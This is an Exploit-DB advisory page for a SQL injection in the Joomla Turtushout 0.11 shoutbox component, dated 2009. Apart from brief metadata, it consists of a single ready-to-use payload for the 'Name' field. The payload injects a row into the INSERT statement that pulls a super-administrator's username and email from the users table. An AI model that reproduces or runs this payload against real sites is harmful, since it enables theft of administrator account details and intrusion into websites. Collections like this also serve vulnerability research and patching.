Joomla! Component Turtushout 0.11 - 'Name' SQL Injection

EDB-ID:

9653

Author:

jdc

Type:

webapps

Platform:

PHP

Published:

2009-09-14

Joomla Component Turtushout 0.11SQL Injection

'Name' field SQL injection:

test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- '

jdc 2009 

# milw0rm.com [2009-09-14]